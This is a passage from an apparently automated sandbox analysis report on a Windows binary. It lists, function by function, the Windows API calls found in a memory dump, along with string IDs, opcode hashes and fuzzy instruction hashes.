                                                                  • GetLastError.KERNEL32(00000000), ref: 00F4F157
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F4F18C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 8b5b645b31be87de96e551e045aebfee9f969007ca22d854b49459d673b159ef
                                                                  • Instruction ID: 0c2c1fec61832a97f6b7d73219269b5dcf142ba7f3b9c31baf00c6065a58eecd
                                                                  • Opcode Fuzzy Hash: 8b5b645b31be87de96e551e045aebfee9f969007ca22d854b49459d673b159ef
                                                                  • Instruction Fuzzy Hash: 2341F0712002009FDB15EF24CC95F6EBBE5AF84324F148419F8069B3C2CBB9A809EB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00F3357C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 760a1ee799672b13c1708a8c63807b75f5dc2039ecaf5abd0017fa403ca8ba05
                                                                  • Instruction ID: 853c234892dd2c45914ae468a1245916a782f5f431eb085eba22f5e7dd94db83
                                                                  • Opcode Fuzzy Hash: 760a1ee799672b13c1708a8c63807b75f5dc2039ecaf5abd0017fa403ca8ba05
                                                                  • Instruction Fuzzy Hash: 8E110832A0930BBEA7519A24DC92DAA77DCDF05370F24001AF6006A181E7A4AF4076B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F34802
                                                                  • LoadStringW.USER32(00000000), ref: 00F34809
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F3481F
                                                                  • LoadStringW.USER32(00000000), ref: 00F34826
                                                                  • _wprintf.LIBCMT ref: 00F3484C
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3486A
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00F34847
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 716122ed46f6ac44a1307fe471159d020575ef0fa8c4fba9c85d1688c0496f96
                                                                  • Instruction ID: 22e682408277d7adfad0a8e40578787288143bb3ffcfc53022c696cf8409cfda
                                                                  • Opcode Fuzzy Hash: 716122ed46f6ac44a1307fe471159d020575ef0fa8c4fba9c85d1688c0496f96
                                                                  • Instruction Fuzzy Hash: 92012CF294020C7BE711ABA0DE89EF7766CEB09300F500596F759E2041EAB4AE845B75
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • GetSystemMetrics.USER32 ref: 00F5DB42
                                                                  • GetSystemMetrics.USER32 ref: 00F5DB62
                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F5DD9D
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F5DDBB
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F5DDDC
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00F5DDFB
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00F5DE20
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F5DE43
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                  • String ID:
                                                                  • API String ID: 1211466189-0
                                                                  • Opcode ID: d428787279430e1697316b450e08773ff5c058180d65dda4d40186232d0ddc0c
                                                                  • Instruction ID: 7e57aaa3afc2881dd36696d1a354928ca05675a3358698be473a48c9830b2a5f
                                                                  • Opcode Fuzzy Hash: d428787279430e1697316b450e08773ff5c058180d65dda4d40186232d0ddc0c
                                                                  • Instruction Fuzzy Hash: 46B1CF31901219EFCF24CF68C9C97AE7BB1FF04712F088069EE489E255D770A954EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5044E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                  • String ID:
                                                                  • API String ID: 3479070676-0
                                                                  • Opcode ID: a5a2efddc27048dbd847110811ecb57ab1d02e93fbee9d7acc32db29dd473ec8
                                                                  • Instruction ID: 0178dd753bc6aeaf26082e506bc7330af1522600c130766a98b0dba48147d0c1
                                                                  • Opcode Fuzzy Hash: a5a2efddc27048dbd847110811ecb57ab1d02e93fbee9d7acc32db29dd473ec8
                                                                  • Instruction Fuzzy Hash: DAA19C712042059FCB10EF24C881F2EBBE5EF84315F14891DFA96972A2DB75E949EF42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00ED2E9F
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000,000000FF), ref: 00ED2EE7
                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00F0C55B
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C508,00000004,00000000,00000000,00000000), ref: 00F0C5C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: b458db30c13b4d06c8d53691a1f88946bbec29601f5d91d2e917f16b0edf5813
                                                                  • Instruction ID: ea7bc39b59699c9ff8b11e446f2ea1930ca034516dddd4b348ee799e273e91bf
                                                                  • Opcode Fuzzy Hash: b458db30c13b4d06c8d53691a1f88946bbec29601f5d91d2e917f16b0edf5813
                                                                  • Instruction Fuzzy Hash: EE412C306047849AC7374728CC8877B7B91EBA1314F28690FEE47627A1CB72B842F750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F37698
                                                                    • Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
                                                                    • Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F376CF
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00F376EB
                                                                  • _memmove.LIBCMT ref: 00F37739
                                                                  • _memmove.LIBCMT ref: 00F37756
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00F37765
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F3777A
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F37799
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 256516436-0
                                                                  • Opcode ID: 059d8f44ed6c749066ac2996f1f3e606583867720c2aafcd8285ffb26db969c2
                                                                  • Instruction ID: fcf4c6231f2290ea30ef0098c53e2990421296f97502944555c595feed2c56d4
                                                                  • Opcode Fuzzy Hash: 059d8f44ed6c749066ac2996f1f3e606583867720c2aafcd8285ffb26db969c2
                                                                  • Instruction Fuzzy Hash: 76318172904209EBCB10EF54DC85EBFB7B8EF45710F2440A5F904AB256DB709E50EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 00F56810
                                                                  • GetDC.USER32(00000000), ref: 00F56818
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F56823
                                                                  • ReleaseDC.USER32 ref: 00F5682F
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F5686B
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F5687C
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F5964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00F568B6
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F568D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 527284c1f22bef584ceed292494a0ec7a0fe698bd2d7a758cf9e10811ed74f35
                                                                  • Instruction ID: e2133bbfc96fb970ed523486d66b8127f91b1cd6dbe08d60c6d6cbe4190c39c6
                                                                  • Opcode Fuzzy Hash: 527284c1f22bef584ceed292494a0ec7a0fe698bd2d7a758cf9e10811ed74f35
                                                                  • Instruction Fuzzy Hash: 46316D721012147FEB118F10CC4AFAB3BA9EF49762F044065FE18DA291CAB59851DB74
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: ddd92b99dc6e6f1690406f3fca74eb4fce1041440aaf39c197d8f12a6a6cecfa
                                                                  • Instruction ID: 6a00d4e2656b7998b0447a0706f53930b501215780b9df7fc31728ddc7175e26
                                                                  • Opcode Fuzzy Hash: ddd92b99dc6e6f1690406f3fca74eb4fce1041440aaf39c197d8f12a6a6cecfa
                                                                  • Instruction Fuzzy Hash: E821A772F0162DBAD604B521AD42FBF37AC9E25754B184024FE06B6342E710DE11E6E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                    • Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D
                                                                  • _wcstok.LIBCMT ref: 00F3F2D7
                                                                  • _wcscpy.LIBCMT ref: 00F3F366
                                                                  • _memset.LIBCMT ref: 00F3F399
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 774024439-3081909835
                                                                  • Opcode ID: a174f6ab12c22a794a75e4fd0568686a38aa8f1409703b9d032ef17421a808d4
                                                                  • Instruction ID: 2b1420914ee98202af42a346d4c1436c47a16634dfb905af6e71b9fcfd267e33
                                                                  • Opcode Fuzzy Hash: a174f6ab12c22a794a75e4fd0568686a38aa8f1409703b9d032ef17421a808d4
                                                                  • Instruction Fuzzy Hash: BCC17B71A047459FC714EF24C881A6AB7E4EF84360F14596DF899A72A2DB30EC49DB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F472EB
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F4730C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F4731F
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00F473D5
                                                                  • inet_ntoa.WSOCK32(?), ref: 00F47392
                                                                    • Part of subcall function 00F2B4EA: _strlen.LIBCMT ref: 00F2B4F4
                                                                    • Part of subcall function 00F2B4EA: _memmove.LIBCMT ref: 00F2B516
                                                                  • _strlen.LIBCMT ref: 00F4742F
                                                                  • _memmove.LIBCMT ref: 00F47498
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 3619996494-0
                                                                  • Opcode ID: a73c14b5bf21e0a6665cad5be5747f29140b0077b5692abfbbc6e3fd9cea924b
                                                                  • Instruction ID: f723f34d9b8f45e017685f5a061fd0fa5c37d579d3ec4e1a71f540e7fac42f05
                                                                  • Opcode Fuzzy Hash: a73c14b5bf21e0a6665cad5be5747f29140b0077b5692abfbbc6e3fd9cea924b
                                                                  • Instruction Fuzzy Hash: 1781CE72508300ABC310EB24DC85E6BBBE8EF94724F105A1DF955AB2E2EB70DD41DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71f3df143bde3ffc1202e55d1c34d7ec0ef266576744621537fa8eb14c7ffbb5
                                                                  • Instruction ID: 6f19f66235679b879998e6d375ebd034d288fe2c5afbb23ade4a3043b76ec4a9
                                                                  • Opcode Fuzzy Hash: 71f3df143bde3ffc1202e55d1c34d7ec0ef266576744621537fa8eb14c7ffbb5
                                                                  • Instruction Fuzzy Hash: CC713E74A00109FFDB08DF58CC45EAEBBB5FF86314F14819AF915AB251C7349A52EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsWindow.USER32(012786F8), ref: 00F5BA5D
                                                                  • IsWindowEnabled.USER32(012786F8), ref: 00F5BA69
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F5BB4D
                                                                  • SendMessageW.USER32(012786F8,000000B0,?,?), ref: 00F5BB84
                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00F5BBC1
                                                                  • GetWindowLongW.USER32(012786F8,000000EC), ref: 00F5BBE3
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F5BBFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                  • String ID:
                                                                  • API String ID: 4072528602-0
                                                                  • Opcode ID: a626f084315bf055552419f6d4b626ac86cc1ef7db65446853325fd7c9703233
                                                                  • Instruction ID: a393c5291fc51b81c532208b64d28f1746fcff041525f0f6696b19a5da001dff
                                                                  • Opcode Fuzzy Hash: a626f084315bf055552419f6d4b626ac86cc1ef7db65446853325fd7c9703233
                                                                  • Instruction Fuzzy Hash: 9971E234A04305AFEB209F54C894FBABBB5EF49322F104059FE55972A1CB75AC48FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F4FB31
                                                                  • _memset.LIBCMT ref: 00F4FBFA
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F4FC3F
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                    • Part of subcall function 00EE436A: _wcscpy.LIBCMT ref: 00EE438D
                                                                  • GetProcessId.KERNEL32(00000000), ref: 00F4FCB6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F4FCE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 3522835683-2766056989
                                                                  • Opcode ID: 114c7ecd3b8dc9b34adf2be62d0cc092b0784713743c161c2c414b685afa48e6
                                                                  • Instruction ID: 7796549687ca91295d0a76781087c08e1385ced76aa4dc21541caccb302499e7
                                                                  • Opcode Fuzzy Hash: 114c7ecd3b8dc9b34adf2be62d0cc092b0784713743c161c2c414b685afa48e6
                                                                  • Instruction Fuzzy Hash: 3D61A0B5A00619DFCB14EF54C4959AEBBF5FF48310F10846AE91ABB391CB30AD45DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00F3178B
                                                                  • GetKeyboardState.USER32(?), ref: 00F317A0
                                                                  • SetKeyboardState.USER32(?), ref: 00F31801
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F3182F
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F3184E
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F31894
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F318B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 0ac85c3779df44621ab719b794fadefda4282a23e2ff785b8e685833a772075d
                                                                  • Instruction ID: 325a9be7aa234167f727239395779c55e5e2549885ff43de7c21e33c3fe6497f
